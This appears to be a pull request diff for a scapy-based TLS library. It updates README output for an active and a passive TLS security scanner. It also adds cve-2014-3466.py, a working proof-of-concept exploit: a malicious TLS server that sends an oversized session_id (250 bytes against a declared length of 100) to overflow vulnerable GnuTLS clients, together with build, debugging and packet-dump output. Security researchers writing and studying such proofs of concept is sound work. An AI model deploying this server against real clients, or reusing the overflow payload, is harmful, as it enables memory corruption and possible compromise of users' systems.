### PR TITLE
certificate_verify msg, passive security_scanner, more checks

### DIFF
--- a/README.md
+++ b/README.md
@@ -719,8 +719,10 @@ TLS1.0 Session Context based decryption of RSA_WITH_AES_128_CBC_SHA for known pr
 
 ##### SSL Security Scanner
 
+Active Scanner:
+
 ```python
-# python examples/security_scanner.py localhost 443 
+# python examples/security_scanner.py active localhost 443 
 
 An example implementation of a passive TLS security scanner with custom starttls support:
 
@@ -735,6 +737,7 @@ Scanning with 10 parallel threads...
 => heartbleed
 => poodle2
 => scsv
+=> secure_renegotiation
 => supported_protocol_versions
 
 
@@ -791,7 +794,7 @@ Scanning with 10 parallel threads...
 [*] supported compressions methods: 1/3
  * NULL (0x0000)
 
-[*] Events: 9
+[*] Events: 12
 * EVENT - HEARTBLEED - vulnerable
 * EVENT - CIPHERS - Export ciphers enabled
 * EVENT - CIPHERS - RC4 ciphers enabled
@@ -800,9 +803,41 @@ Scanning with 10 parallel threads...
 * EVENT - LOGJAM - server supports weak DH-Group (512) (DHE_*_EXPORT) cipher suites
 * EVENT - PROTOCOL VERSION - SSLv3 supported 
 * EVENT - HEARTBEAT - enabled (non conclusive heartbleed) 
+* EVENT - INSUFFICIENT SERVER CERT PUBKEY SIZE - 2048 >= 640 bits
+* EVENT - SUSPICIOUS SERVER CERT PUBKEY SIZE - 640 not a multiple of 2048 bits
+* EVENT - SERVER CERT PUBKEY FACTORED - trivial private_key recovery possible due to known factors n = p x q. See https://en.wikipedia.org/wiki/RSA_numbers | grep 3107418240490043721350750035888567930037346022842727545720161948823206440518081504556346829671723286782437916272838033415471073108501919548529007337724822783525742386454014691736602477652346609
 * EVENT - DOWNGRADE / POODLE - FALLBACK_SCSV - not honored
 
 Scan took: 8.60623884201s
+```
+
+Passive Scanner:
+
+```python
+# python examples/security_scanner.py sniff 192.168.139.131 443 
+An example implementation of a passive TLS security scanner with custom starttls support:
+
+    TLSScanner() generates TLS probe traffic  (optional)
+    TLSInfo() passively evaluates the traffic and generates events/warning
+
+    
+
+[*] [passive] Scanning in 'sniff' mode...
+Connection: 192.168.139.1:1364 <==> 192.168.139.131:443
+* EVENT - CRIME - client supports compression
+* EVENT - SLOTH - client announces capability of signature/hash algorithm: RSA/sha1
+Connection: 192.168.139.131:443 <==> 192.168.139.1:1364
+* EVENT - CRIME - client supports compression
+* EVENT - SLOTH - client announces capability of signature/hash algorithm: RSA/sha1
+Connection: 192.168.139.131:443 <==> 192.168.139.1:1364
+* EVENT - CRIME - client supports compression
+* EVENT - SLOTH - client announces capability of signature/hash algorithm: RSA/sha1
+* EVENT - CRIME - server supports compression
+* EVENT - INSUFFICIENT SERVER CERT PUBKEY SIZE - 2048 >= 640 bits
+* EVENT - SUSPICIOUS SERVER CERT PUBKEY SIZE - 640 not a multiple of 2048 bits
+* EVENT - SERVER CERT PUBKEY FACTORED - trivial private_key recovery possible due to known factors n = p x q. See https://en.wikipedia.org/wiki/RSA_numbers | grep 3107418240490043721350750035888567930037346022842727545720161948823206440518081504556346829671723286782437916272838033415471073108501919548529007337724822783525742386454014691736602477652346609
+* EVENT - HEARTBEAT - enabled (non conclusive heartbleed) 
+Connection: 192.168.139.1:1364 <==> 192.168.139.131:443
 ```
 
 ## Authors / Contributors

--- a/examples/cve-2014-3466.py
+++ b/examples/cve-2014-3466.py
@@ -1,0 +1,190 @@
+#!/usr/bin/env python
+# -*- coding: UTF-8 -*-
+# Author : tintinweb@oststrom.com <github.com/tintinweb>
+#
+# ref: https://bugzilla.redhat.com/show_bug.cgi?id=1101932
+#
+'''
+    # wget http://www.lysator.liu.se/~nisse/archive/nettle-2.5.tar.gz
+    # tar xvfz nettle-2.5.tar.gz
+    # cd nettle-2.5/
+    # aptitude install libgmp-dev
+    # ./configure --enable-shared --prefix=/usr
+    # make
+    # make install
+    # cd ../gnutls-3.1.24/
+    # ./configure --with-libnettle-prefix=/usr
+    # make
+    # gdb --args ./src/.libs/lt-gnutls-cli-debug 192.168.139.1
+
+[!] new client ('127.0.0.1', 36396) connected!
+###[ SSL/TLS ]###
+  \records   \
+   |###[ TLS Record ]###
+   |  content_type= handshake
+   |  version   = TLS_1_0
+   |  length    = 0x12d
+   |###[ TLS Handshake ]###
+   |     type      = client_hello
+   |     length    = 0x129
+   |###[ TLS Client Hello ]###
+   |        version   = TLS_1_2
+   |        gmt_unix_time= 2160684724L
+   |        random_bytes= '\xfd-2\xecL\x0fcM\xd2`\x8d\xc5\\\r\xd0\xa3\x03\x98h\xa93\xbe\x9b\xeb<\xac\xa4\x01'
+   |        session_id_length= 0x0
+   |        session_id= ''
+   |        cipher_suites_length= 0x92
+   |        cipher_suites= ['ECDHE_RSA_WITH_AES_256_GCM_SHA384', 'ECDHE_ECDSA_WITH_AES_256_GCM_SHA384', 'ECDHE_RSA_WITH_AES_256_CBC_SHA384', 'ECDHE_ECDSA_WITH_AES_256_CBC_SHA384', 'ECDHE_RSA_WITH_AES_256_CBC_SHA', 'ECDHE_ECDSA_WITH_AES_256_CBC_SHA', 'DHE_DSS_WITH_AES_256_GCM_SHA384', 'DHE_RSA_WITH_AES_256_GCM_SHA384', 'DHE_RSA_WITH_AES_256_CBC_SHA256', 'DHE_DSS_WITH_AES_256_CBC_SHA256', 'DHE_RSA_WITH_AES_256_CBC_SHA', 'DHE_DSS_WITH_AES_256_CBC_SHA', 'DHE_RSA_WITH_CAMELLIA_256_CBC_SHA', 'DHE_DSS_WITH_CAMELLIA_256_CBC_SHA', 'ECDH_RSA_WITH_AES_256_GCM_SHA384', 'ECDH_ECDSA_WITH_AES_256_GCM_SHA384', 'ECDH_RSA_WITH_AES_256_CBC_SHA384', 'ECDH_ECDSA_WITH_AES_256_CBC_SHA384', 'ECDH_RSA_WITH_AES_256_CBC_SHA', 'ECDH_ECDSA_WITH_AES_256_CBC_SHA', 'RSA_WITH_AES_256_GCM_SHA384', 'RSA_WITH_AES_256_CBC_SHA256', 'RSA_WITH_AES_256_CBC_SHA', 'RSA_WITH_CAMELLIA_256_CBC_SHA', 'ECDHE_RSA_WITH_AES_128_GCM_SHA256', 'ECDHE_ECDSA_WITH_AES_128_GCM_SHA256', 'ECDHE_RSA_WITH_AES_128_CBC_SHA256', 'ECDHE_ECDSA_WITH_AES_128_CBC_SHA256', 'ECDHE_RSA_WITH_AES_128_CBC_SHA', 'ECDHE_ECDSA_WITH_AES_128_CBC_SHA', 'DHE_DSS_WITH_AES_128_GCM_SHA256', 'DHE_RSA_WITH_AES_128_GCM_SHA256', 'DHE_RSA_WITH_AES_128_CBC_SHA256', 'DHE_DSS_WITH_AES_128_CBC_SHA256', 'DHE_RSA_WITH_AES_128_CBC_SHA', 'DHE_DSS_WITH_AES_128_CBC_SHA', 'DHE_RSA_WITH_SEED_CBC_SHA', 'DHE_DSS_WITH_SEED_CBC_SHA', 'DHE_RSA_WITH_CAMELLIA_128_CBC_SHA', 'DHE_DSS_WITH_CAMELLIA_128_CBC_SHA', 'ECDH_RSA_WITH_AES_128_GCM_SHA256', 'ECDH_ECDSA_WITH_AES_128_GCM_SHA256', 'ECDH_RSA_WITH_AES_128_CBC_SHA256', 'ECDH_ECDSA_WITH_AES_128_CBC_SHA256', 'ECDH_RSA_WITH_AES_128_CBC_SHA', 'ECDH_ECDSA_WITH_AES_128_CBC_SHA', 'RSA_WITH_AES_128_GCM_SHA256', 'RSA_WITH_AES_128_CBC_SHA256', 'RSA_WITH_AES_128_CBC_SHA', 'RSA_WITH_SEED_CBC_SHA', 'RSA_WITH_CAMELLIA_128_CBC_SHA', 'ECDHE_RSA_WITH_RC4_128_SHA', 'ECDHE_ECDSA_WITH_RC4_128_SHA', 'ECDH_RSA_WITH_RC4_128_SHA', 'ECDH_ECDSA_WITH_RC4_128_SHA', 'RSA_WITH_RC4_128_SHA', 'RSA_WITH_RC4_128_MD5', 'ECDHE_RSA_WITH_3DES_EDE_CBC_SHA', 'ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA', 'DHE_RSA_WITH_3DES_EDE_CBC_SHA', 'DHE_DSS_WITH_3DES_EDE_CBC_SHA', 'ECDH_RSA_WITH_3DES_EDE_CBC_SHA', 'ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA', 'RSA_WITH_3DES_EDE_CBC_SHA', 'DHE_RSA_WITH_DES_CBC_SHA', 'DHE_DSS_WITH_DES_CBC_SHA', 'RSA_WITH_DES_CBC_SHA', 'DHE_RSA_EXPORT_WITH_DES40_CBC_SHA', 'DHE_DSS_EXPORT_WITH_DES40_CBC_SHA', 'RSA_EXPORT_WITH_DES40_CBC_SHA', 'RSA_EXPORT_WITH_RC2_CBC_40_MD5', 'RSA_EXPORT_WITH_RC4_40_MD5', 'EMPTY_RENEGOTIATION_INFO_SCSV']
+   |        compression_methods_length= 0x2
+   |        compression_methods= ['DEFLATE', 'NULL']
+   |        extensions_length= 0x6d
+   |        \extensions\
+   |         |###[ TLS Extension ]###
+   |         |  type      = ec_point_formats
+   |         |  length    = 0x4
+   |         |###[ TLS Extension EC Points Format ]###
+   |         |     length    = 0x3
+   |         |     ec_point_formats= ['uncompressed', 'ansiX962_compressed_prime', 'ansiX962_compressed_char2']
+   |         |###[ TLS Extension ]###
+   |         |  type      = supported_groups
+   |         |  length    = 0x34
+   |         |###[ TLS Extension Elliptic Curves ]###
+   |         |     length    = 0x32
+   |         |     elliptic_curves= ['sect571r1', 'sect571k1', 'secp521r1', 'sect409k1', 'sect409r1', 'secp384r1', 'sect283k1', 'sect283r1', 'secp256k1', 'secp256r1', 'sect239k1', 'sect233k1', 'sect233r1', 'secp224k1', 'secp224r1', 'sect193r1', 'sect193r2', 'secp192k1', 'secp192r1', 'sect163k1', 'sect163r1', 'sect163r2', 'secp160k1', 'secp160r1', 'secp160r2']
+   |         |###[ TLS Extension ]###
+   |         |  type      = SessionTicket TLS
+   |         |  length    = 0x0
+   |         |###[ TLS Extension ]###
+   |         |  type      = signature_algorithms
+   |         |  length    = 0x20
+   |         |###[ TLS Extension Signature And Hash Algorithm ]###
+   |         |     length    = 0x1e
+   |         |     \algorithms\
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha512
+   |         |      |  signature_algorithm= rsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha512
+   |         |      |  signature_algorithm= dsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha512
+   |         |      |  signature_algorithm= ecdsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha384
+   |         |      |  signature_algorithm= rsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha384
+   |         |      |  signature_algorithm= dsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha384
+   |         |      |  signature_algorithm= ecdsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha256
+   |         |      |  signature_algorithm= rsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha256
+   |         |      |  signature_algorithm= dsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha256
+   |         |      |  signature_algorithm= ecdsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha224
+   |         |      |  signature_algorithm= rsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha224
+   |         |      |  signature_algorithm= dsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha224
+   |         |      |  signature_algorithm= ecdsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha1
+   |         |      |  signature_algorithm= rsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha1
+   |         |      |  signature_algorithm= dsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha1
+   |         |      |  signature_algorithm= ecdsa
+   |         |###[ TLS Extension ]###
+   |         |  type      = heartbeat
+   |         |  length    = 0x1
+   |         |###[ TLS Extension HeartBeat ]###
+   |         |     mode      = peer_allowed_to_send
+[*] received TLSClientHello, sending malicious server hello
+###[ TLS Record ]###
+  content_type= handshake
+  version   = SSL_3_0
+  length    = None
+###[ TLS Handshake ]###
+     type      = server_hello
+     length    = None
+###[ TLS Server Hello ]###
+        version   = SSL_3_0
+        gmt_unix_time= 1453065593
+        random_bytes= '\x99\x84\x08\x97\xa0I\n\xe3\xcf\xcb\xc96\x9d\x99pw\x06P\x11\xc8\xdd\xe1\x83\xea.\xef\x15\x16'
+        session_id_length= 0x64
+        session_id= '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff'
+        cipher_suite= RSA_WITH_3DES_EDE_CBC_SHA
+        compression_method= NULL
+        \extensions\
+'''
+
+import os
+import sys
+import socket
+
+from scapy.all import conf, log_interactive
+
+try:
+    # This import works from the project directory
+    basedir = os.path.abspath(os.path.join(os.path.dirname(__file__),"../"))
+    sys.path.append(basedir)
+    from scapy_ssl_tls.ssl_tls_automata import TLSServerAutomata
+    from scapy_ssl_tls.ssl_tls import *
+except ImportError:
+    # If you installed this package via pip, you just need to execute this
+    from scapy.layers.ssl_tls_automata import TLSServerAutomata
+    from scapy.layers.ssl_tls import *
+
+
+def main():
+    host = sys.argv[1] if len(sys.argv)>1 else "0.0.0.0"
+    port = int(sys.argv[2]) if len(sys.argv)>2 else 443
+    target = host,port
+
+    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+    sock.bind(target)
+    sock.listen(1)
+    print "[ ] listening on %s ..."%repr(target) 
+            
+    while True:
+        client_sock, client_addr = sock.accept()
+        print "[!] new client %s connected!"%repr(client_addr)
+        
+        tlssock = TLSSocket(client_sock, client=False)
+        
+        p_client_hello = tlssock.recvall()
+        p_client_hello.show()
+        
+        if not p_client_hello.haslayer(TLSClientHello):
+            print "[!] did not receive a TLSClientHello from client, disconnecting."
+            client_sock.close()
+            continue
+        print "[*] received TLSClientHello, sending malicious server hello (announcing sessid_len=100, sending 250 bytes)"
+        
+        cipher =  p_client_hello[TLSClientHello].cipher_suites[0] if TLSCipherSuite.RSA_WITH_AES_128_CBC_SHA not in p_client_hello[TLSClientHello].cipher_suites else TLSCipherSuite.RSA_WITH_AES_128_CBC_SHA
+        
+        p_server_hello = TLSRecord(version=p_client_hello[TLSHandshake].version)/TLSHandshake()/ \
+                            TLSServerHello(version=p_client_hello[TLSHandshake].version, 
+                                            compression_method = TLSCompressionMethod.NULL,
+                                            cipher_suite = cipher,
+                                            session_id_length = 100,
+                                            session_id = '\xff'*250,     # overflow
+                                            )
+    
+        p_server_hello.show()
+        tlssock.sendall(p_server_hello)
+
+if __name__=="__main__":
+    main()
+    

--- a/examples/cve-2014-3466.py
+++ b/examples/cve-2014-3466.py
@@ -17,114 +17,133 @@
     # make
     # gdb --args ./src/.libs/lt-gnutls-cli-debug 192.168.139.1
 
-[!] new client ('127.0.0.1', 36396) connected!
+[!] new client ('127.0.0.1', 65232) connected!
 ###[ SSL/TLS ]###
   \records   \
    |###[ TLS Record ]###
    |  content_type= handshake
    |  version   = TLS_1_0
-   |  length    = 0x12d
+   |  length    = 0xb2
    |###[ TLS Handshake ]###
    |     type      = client_hello
-   |     length    = 0x129
+   |     length    = 0xae
    |###[ TLS Client Hello ]###
    |        version   = TLS_1_2
-   |        gmt_unix_time= 2160684724L
-   |        random_bytes= '\xfd-2\xecL\x0fcM\xd2`\x8d\xc5\\\r\xd0\xa3\x03\x98h\xa93\xbe\x9b\xeb<\xac\xa4\x01'
+   |        gmt_unix_time= 839422725
+   |        random_bytes= "*\xbfP\x81-\xdf(\x8a'X\xbe#%#\x89uk\xd3\x08Z\xda\xe3d\x05\x0eL\xab\xdb"
    |        session_id_length= 0x0
    |        session_id= ''
-   |        cipher_suites_length= 0x92
-   |        cipher_suites= ['ECDHE_RSA_WITH_AES_256_GCM_SHA384', 'ECDHE_ECDSA_WITH_AES_256_GCM_SHA384', 'ECDHE_RSA_WITH_AES_256_CBC_SHA384', 'ECDHE_ECDSA_WITH_AES_256_CBC_SHA384', 'ECDHE_RSA_WITH_AES_256_CBC_SHA', 'ECDHE_ECDSA_WITH_AES_256_CBC_SHA', 'DHE_DSS_WITH_AES_256_GCM_SHA384', 'DHE_RSA_WITH_AES_256_GCM_SHA384', 'DHE_RSA_WITH_AES_256_CBC_SHA256', 'DHE_DSS_WITH_AES_256_CBC_SHA256', 'DHE_RSA_WITH_AES_256_CBC_SHA', 'DHE_DSS_WITH_AES_256_CBC_SHA', 'DHE_RSA_WITH_CAMELLIA_256_CBC_SHA', 'DHE_DSS_WITH_CAMELLIA_256_CBC_SHA', 'ECDH_RSA_WITH_AES_256_GCM_SHA384', 'ECDH_ECDSA_WITH_AES_256_GCM_SHA384', 'ECDH_RSA_WITH_AES_256_CBC_SHA384', 'ECDH_ECDSA_WITH_AES_256_CBC_SHA384', 'ECDH_RSA_WITH_AES_256_CBC_SHA', 'ECDH_ECDSA_WITH_AES_256_CBC_SHA', 'RSA_WITH_AES_256_GCM_SHA384', 'RSA_WITH_AES_256_CBC_SHA256', 'RSA_WITH_AES_256_CBC_SHA', 'RSA_WITH_CAMELLIA_256_CBC_SHA', 'ECDHE_RSA_WITH_AES_128_GCM_SHA256', 'ECDHE_ECDSA_WITH_AES_128_GCM_SHA256', 'ECDHE_RSA_WITH_AES_128_CBC_SHA256', 'ECDHE_ECDSA_WITH_AES_128_CBC_SHA256', 'ECDHE_RSA_WITH_AES_128_CBC_SHA', 'ECDHE_ECDSA_WITH_AES_128_CBC_SHA', 'DHE_DSS_WITH_AES_128_GCM_SHA256', 'DHE_RSA_WITH_AES_128_GCM_SHA256', 'DHE_RSA_WITH_AES_128_CBC_SHA256', 'DHE_DSS_WITH_AES_128_CBC_SHA256', 'DHE_RSA_WITH_AES_128_CBC_SHA', 'DHE_DSS_WITH_AES_128_CBC_SHA', 'DHE_RSA_WITH_SEED_CBC_SHA', 'DHE_DSS_WITH_SEED_CBC_SHA', 'DHE_RSA_WITH_CAMELLIA_128_CBC_SHA', 'DHE_DSS_WITH_CAMELLIA_128_CBC_SHA', 'ECDH_RSA_WITH_AES_128_GCM_SHA256', 'ECDH_ECDSA_WITH_AES_128_GCM_SHA256', 'ECDH_RSA_WITH_AES_128_CBC_SHA256', 'ECDH_ECDSA_WITH_AES_128_CBC_SHA256', 'ECDH_RSA_WITH_AES_128_CBC_SHA', 'ECDH_ECDSA_WITH_AES_128_CBC_SHA', 'RSA_WITH_AES_128_GCM_SHA256', 'RSA_WITH_AES_128_CBC_SHA256', 'RSA_WITH_AES_128_CBC_SHA', 'RSA_WITH_SEED_CBC_SHA', 'RSA_WITH_CAMELLIA_128_CBC_SHA', 'ECDHE_RSA_WITH_RC4_128_SHA', 'ECDHE_ECDSA_WITH_RC4_128_SHA', 'ECDH_RSA_WITH_RC4_128_SHA', 'ECDH_ECDSA_WITH_RC4_128_SHA', 'RSA_WITH_RC4_128_SHA', 'RSA_WITH_RC4_128_MD5', 'ECDHE_RSA_WITH_3DES_EDE_CBC_SHA', 'ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA', 'DHE_RSA_WITH_3DES_EDE_CBC_SHA', 'DHE_DSS_WITH_3DES_EDE_CBC_SHA', 'ECDH_RSA_WITH_3DES_EDE_CBC_SHA', 'ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA', 'RSA_WITH_3DES_EDE_CBC_SHA', 'DHE_RSA_WITH_DES_CBC_SHA', 'DHE_DSS_WITH_DES_CBC_SHA', 'RSA_WITH_DES_CBC_SHA', 'DHE_RSA_EXPORT_WITH_DES40_CBC_SHA', 'DHE_DSS_EXPORT_WITH_DES40_CBC_SHA', 'RSA_EXPORT_WITH_DES40_CBC_SHA', 'RSA_EXPORT_WITH_RC2_CBC_40_MD5', 'RSA_EXPORT_WITH_RC4_40_MD5', 'EMPTY_RENEGOTIATION_INFO_SCSV']
-   |        compression_methods_length= 0x2
-   |        compression_methods= ['DEFLATE', 'NULL']
-   |        extensions_length= 0x6d
+   |        cipher_suites_length= 0x16
+   |        cipher_suites= ['ECDHE_ECDSA_WITH_AES_128_GCM_SHA256', 'ECDHE_RSA_WITH_AES_128_GCM_SHA256', 'ECDHE_ECDSA_WITH_AES_256_CBC_SHA', 'ECDHE_ECDSA_WITH_AES_128_CBC_SHA', 'ECDHE_RSA_WITH_AES_128_CBC_SHA', 'ECDHE_RSA_WITH_AES_256_CBC_SHA', 'DHE_RSA_WITH_AES_128_CBC_SHA', 'DHE_RSA_WITH_AES_256_CBC_SHA', 'RSA_WITH_AES_128_CBC_SHA', 'RSA_WITH_AES_256_CBC_SHA', 'RSA_WITH_3DES_EDE_CBC_SHA']
+   |        compression_methods_length= 0x1
+   |        compression_methods= ['NULL']
+   |        extensions_length= 0x6f
    |        \extensions\
    |         |###[ TLS Extension ]###
-   |         |  type      = ec_point_formats
-   |         |  length    = 0x4
-   |         |###[ TLS Extension EC Points Format ]###
-   |         |     length    = 0x3
-   |         |     ec_point_formats= ['uncompressed', 'ansiX962_compressed_prime', 'ansiX962_compressed_char2']
+   |         |  type      = server_name
+   |         |  length    = 0xe
+   |         |###[ TLS Extension Servername Indication ]###
+   |         |     length    = 0xc
+   |         |     \server_names\
+   |         |      |###[ TLS Servername ]###
+   |         |      |  type      = host
+   |         |      |  length    = 0x9
+   |         |      |  data      = 'localhost'
+   |         |###[ TLS Extension ]###
+   |         |  type      = renegotiation_info
+   |         |  length    = 0x1
+   |         |###[ TLS Extension Renegotiation Info ]###
+   |         |     length    = 0x0
+   |         |     data      = ''
    |         |###[ TLS Extension ]###
    |         |  type      = supported_groups
-   |         |  length    = 0x34
+   |         |  length    = 0x8
    |         |###[ TLS Extension Elliptic Curves ]###
-   |         |     length    = 0x32
-   |         |     elliptic_curves= ['sect571r1', 'sect571k1', 'secp521r1', 'sect409k1', 'sect409r1', 'secp384r1', 'sect283k1', 'sect283r1', 'secp256k1', 'secp256r1', 'sect239k1', 'sect233k1', 'sect233r1', 'secp224k1', 'secp224r1', 'sect193r1', 'sect193r2', 'secp192k1', 'secp192r1', 'sect163k1', 'sect163r1', 'sect163r2', 'secp160k1', 'secp160r1', 'secp160r2']
+   |         |     length    = 0x6
+   |         |     elliptic_curves= ['secp256r1', 'secp384r1', 'secp521r1']
    |         |###[ TLS Extension ]###
-   |         |  type      = SessionTicket TLS
+   |         |  type      = ec_point_formats
+   |         |  length    = 0x2
+   |         |###[ TLS Extension EC Points Format ]###
+   |         |     length    = 0x1
+   |         |     ec_point_formats= ['uncompressed']
+   |         |###[ TLS Extension ]###
+   |         |  type      = SessionTicket_TLS
    |         |  length    = 0x0
    |         |###[ TLS Extension ]###
+   |         |  type      = next_protocol_negotiation
+   |         |  length    = 0x0
+   |         |###[ TLS Extension ]###
+   |         |  type      = application_layer_protocol_negotiation
+   |         |  length    = 0x17
+   |         |###[ TLS Extension Application-Layer Protocol Negotiation ]###
+   |         |     length    = 0x15
+   |         |     \protocol_name_list\
+   |         |      |###[ TLS ALPN Protocol ]###
+   |         |      |  length    = 0x2
+   |         |      |  data      = 'h2'
+   |         |      |###[ TLS ALPN Protocol ]###
+   |         |      |  length    = 0x8
+   |         |      |  data      = 'spdy/3.1'
+   |         |      |###[ TLS ALPN Protocol ]###
+   |         |      |  length    = 0x8
+   |         |      |  data      = 'http/1.1'
+   |         |###[ TLS Extension ]###
+   |         |  type      = status_request
+   |         |  length    = 0x5
+   |         |###[ Raw ]###
+   |         |     load      = '\x01\x00\x00\x00\x00'
+   |         |###[ TLS Extension ]###
    |         |  type      = signature_algorithms
-   |         |  length    = 0x20
+   |         |  length    = 0x16
    |         |###[ TLS Extension Signature And Hash Algorithm ]###
-   |         |     length    = 0x1e
+   |         |     length    = 0x14
    |         |     \algorithms\
    |         |      |###[ TLS Signature Hash Algorithm Pair ]###
-   |         |      |  hash_algorithm= sha512
+   |         |      |  hash_algorithm= sha256
    |         |      |  signature_algorithm= rsa
-   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
-   |         |      |  hash_algorithm= sha512
-   |         |      |  signature_algorithm= dsa
-   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
-   |         |      |  hash_algorithm= sha512
-   |         |      |  signature_algorithm= ecdsa
    |         |      |###[ TLS Signature Hash Algorithm Pair ]###
    |         |      |  hash_algorithm= sha384
    |         |      |  signature_algorithm= rsa
    |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha512
+   |         |      |  signature_algorithm= rsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha1
+   |         |      |  signature_algorithm= rsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
+   |         |      |  hash_algorithm= sha256
+   |         |      |  signature_algorithm= ecdsa
+   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
    |         |      |  hash_algorithm= sha384
-   |         |      |  signature_algorithm= dsa
-   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
-   |         |      |  hash_algorithm= sha384
    |         |      |  signature_algorithm= ecdsa
    |         |      |###[ TLS Signature Hash Algorithm Pair ]###
-   |         |      |  hash_algorithm= sha256
-   |         |      |  signature_algorithm= rsa
-   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
-   |         |      |  hash_algorithm= sha256
-   |         |      |  signature_algorithm= dsa
-   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
-   |         |      |  hash_algorithm= sha256
-   |         |      |  signature_algorithm= ecdsa
-   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
-   |         |      |  hash_algorithm= sha224
-   |         |      |  signature_algorithm= rsa
-   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
-   |         |      |  hash_algorithm= sha224
-   |         |      |  signature_algorithm= dsa
-   |         |      |###[ TLS Signature Hash Algorithm Pair ]###
-   |         |      |  hash_algorithm= sha224
+   |         |      |  hash_algorithm= sha512
    |         |      |  signature_algorithm= ecdsa
    |         |      |###[ TLS Signature Hash Algorithm Pair ]###
    |         |      |  hash_algorithm= sha1
-   |         |      |  signature_algorithm= rsa
+   |         |      |  signature_algorithm= ecdsa
    |         |      |###[ TLS Signature Hash Algorithm Pair ]###
-   |         |      |  hash_algorithm= sha1
+   |         |      |  hash_algorithm= sha256
    |         |      |  signature_algorithm= dsa
    |         |      |###[ TLS Signature Hash Algorithm Pair ]###
    |         |      |  hash_algorithm= sha1
-   |         |      |  signature_algorithm= ecdsa
-   |         |###[ TLS Extension ]###
-   |         |  type      = heartbeat
-   |         |  length    = 0x1
-   |         |###[ TLS Extension HeartBeat ]###
-   |         |     mode      = peer_allowed_to_send
-[*] received TLSClientHello, sending malicious server hello
+   |         |      |  signature_algorithm= dsa
+[*] received TLSClientHello, sending malicious server hello (announcing sessid_len=100, sending 250 bytes)
 ###[ TLS Record ]###
   content_type= handshake
-  version   = SSL_3_0
+  version   = TLS_1_2
   length    = None
 ###[ TLS Handshake ]###
      type      = server_hello
      length    = None
 ###[ TLS Server Hello ]###
-        version   = SSL_3_0
-        gmt_unix_time= 1453065593
-        random_bytes= '\x99\x84\x08\x97\xa0I\n\xe3\xcf\xcb\xc96\x9d\x99pw\x06P\x11\xc8\xdd\xe1\x83\xea.\xef\x15\x16'
+        version   = TLS_1_2
+        gmt_unix_time= 1453853279
+        random_bytes= '\xac\xf97\xfe\xa8\xc6\xeb\xce\x07y\xb7+\x9aB\xd5^I\x87:\xc1\x0b\xb4\x03\xcf\x10K\xb0Y'
         session_id_length= 0x64
